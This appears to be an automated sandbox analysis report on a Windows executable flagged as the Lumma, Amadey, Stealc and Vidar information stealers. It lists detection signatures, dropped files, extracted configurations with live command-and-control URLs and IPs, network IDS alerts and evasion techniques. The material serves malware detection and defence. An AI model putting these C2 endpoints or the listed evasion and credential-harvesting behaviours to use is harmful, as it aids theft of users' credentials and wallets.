Windows Analysis Report
g4Cyr2T5jq.exe

Overview

General Information

Sample name: g4Cyr2T5jq.exe
renamed because original name is a hash value
Original sample name: 7d31fad9b219d539d3c5915dff14a669.exe
Analysis ID: 1540827
MD5: 7d31fad9b219d539d3c5915dff14a669
SHA1: dbe2d2eb17f70be6e9646e56c3a0085fe434988e
SHA256: 80ea1e48313acf9319d608d3afe7733cd466d8451ad89b61c4b09c0f7c0764a2
Tags: exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, Credential Flusher, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: g4Cyr2T5jq.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000006.00000003.2635193986.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 32.0.num.exe.40000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 32.0.num.exe.40000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: g4Cyr2T5jq.exe ReversingLabs: Detection: 55%
Source: g4Cyr2T5jq.exe Virustotal: Detection: 52% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: g4Cyr2T5jq.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 8_2_6C8B6C80
Uses 32bit PE files
Source: g4Cyr2T5jq.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:61009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:61011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:61035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:61074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:61076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:61094 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:61098 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61103 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: 7e96f85771.exe, 00000008.00000002.3210751552.000000006C91D000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: nss3.pdb@ source: 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: nss3.pdb source: 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: mozglue.pdb source: 7e96f85771.exe, 00000008.00000002.3210751552.000000006C91D000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: cb#3.Pdb#3. source: firefox.exe, 00000017.00000002.3106659324.000002882317B000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 7_2_008199D0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_007DD110
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_007DD110
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 7_2_007DFCA0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 7_2_007E0EEC
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00815700
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 7_2_007E6F91
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 7_2_007ED961
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 7_2_00813920
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 7_2_007D49A0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 7_2_007D5A50
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then jmp eax 7_2_007E1A3C
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_007E42FC
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then jmp eax 7_2_007E1ACD
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 7_2_00814A40
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov ebp, eax 7_2_007DA300
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 7_2_007E1BEE
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_007E3BE2
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 7_2_00819B60
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 7_2_007FC470
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_007ED457
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00819CE0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 7_2_00819CE0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 7_2_007EB410
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 7_2_007FCCD0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_007FCCD0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 7_2_007FCCD0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_007E6536
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_007F9510
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 7_2_007FFD10
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h] 7_2_007D8590
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 7_2_007E6EBF
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 7_2_007DBEB0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 7_2_007D6EA0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 7_2_007E1E93
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 7_2_007E6F91
Source: firefox.exe Memory has grown: Private usage: 1MB later: 198MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:60964 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:60978
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:49749 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:63961 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:64436 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:55933 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:62917 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:53062 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:56049 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:60882 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:61008 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:61013 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:61014 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:61014 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:61014
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:61014 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:61014
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:61014 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:53956 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:49672 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:50650 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:61295 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:62669 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:64789 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:52892 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:60339 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:61017 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:61027 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:64826 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:52542 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:64381 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:55996 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:53787 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:61050 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:51551 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:60782 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:63481 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:61082 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:61083 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:61060 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:61057 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:61076 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:61076 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:61011 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:61011 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:61065 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:61079 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:61079 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:61009 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:61016 -> 104.102.49.254:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
